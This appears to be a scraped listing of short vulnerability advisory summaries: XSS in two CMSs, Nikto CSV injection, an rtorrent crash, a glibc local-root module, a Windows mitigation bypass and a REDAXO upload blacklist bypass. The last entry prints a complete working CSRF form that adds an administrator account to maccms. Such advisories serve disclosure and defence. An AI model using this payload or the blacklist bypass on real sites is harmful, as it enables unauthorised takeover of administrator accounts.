CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers to inject arbitrary OS commands via the Server field in an HTTP response header, which is directly injected into a CSV report.
A Reflected Cross-Site Scripting web vulnerability has been discovered in the 'Dimofinf CMS' web-application. The vulnerability is located in the 'id' parameter of the`news.php` action GET method request.
Attackers can unlock the client app installed on Windows OS(others?) without the passcode and access to all the files, chats, images, and etc. the attacker can then send, receive message of any kind on the behalf of the authorized user. PoC (.NET 4.0 Visual Basic) is provided.
A Reflected Cross-Site Scripting web vulnerability has been discovered in the 'OEcms v3.1' web-application. The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request.
This crash is due to a bad bencode parse of the handshake data map. Specifically, by providing a massive length for a string, namely the key of a map entry, malloc fails, returning 0, which is passed to a memcpy call that causes the segfault. This can be triggered actively by sending the crash-triggering data to a seeding rtorrent client, or when a downloading rtorrent client connects to a malicious peer.
The application suffers from an unquoted search path issue impacting the service 'dnwhodisp' for Windows deployed as part of RSLinx and FactoryTalk. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
In the REDAXO CMS under version 5.6.0 the mediapool addon is vulnerable. Users who have an user-account, like editor, can use the mediapool to upload files. The mediapool addon under version 2.4.0 uses a blacklist for fileupload. For users it isn't possible upload files named: php, php4, php5, php6 or php7. But, if you name the files like php71 or php53 the blacklist-function ignore this and upload of shellcode-file is possible.
This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior. This module uses halfdog's RationalLove exploit to exploit a buffer underflow in glibc realpath() and create a SUID root shell. The exploit has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1. The target system must have unprivileged user namespaces enabled.
It’s possible to bypass the child process restriction mitigation policy by impersonating the anonymous token leading to a security feature bypass. Windows 10 has a mitigation policy to restrict a process creating new child processes. During process creation the token flag is checked in SeSubProcessToken which creates the new primary token for the new process. It’s possible to also specify a flag for overriding the behavior, the code looks something like the following: if (ChildProcessOptions & PROCESS_CREATION_CHILD_PROCESS_OVERRIDE) { PTOKEN CurrentToken = PsReferenceEffectiveToken( KeGetCurrentThread(), &Type, &CopyOnOpen, &ImpersonationLevel); if ( Type == TokenImpersonation && ImpersonationLevel < SecurityImpersonation || (SeTokenIsNoChildProcessRestrictionEnforced(CurrentToken) != 0 && Type != TokenPrimary)) { return STATUS_CHILD_PROCESS_BLOCKED; } } This checks if the PROCESS_CREATION_CHILD_PROCESS_OVERRIDE is set then either the primary or impersonation token do not have the restrict child process flag set. If the token does have the flag then STATUS_CHILD_PROCESS_BLOCKED is returned and process creation fails. The problem with this code is it entirely relies on a process not being able to get an impersonation token without the flag.
I found a CSRF vulnerability in maccms_v10,this vulnerability can be arbitrarily added to users. The payload for attack is as follows: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST"> <input type="hidden" name="admin_id" value="" /> <input type="hidden" name="admin_name" value="test2" /> <input type="hidden" name="admin_pwd" value="test2" /> <input type="hidden" name="admin_status" value="1" /> <input type="hidden" name="admin_auth[0]" value="index/welcome" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Services By CQR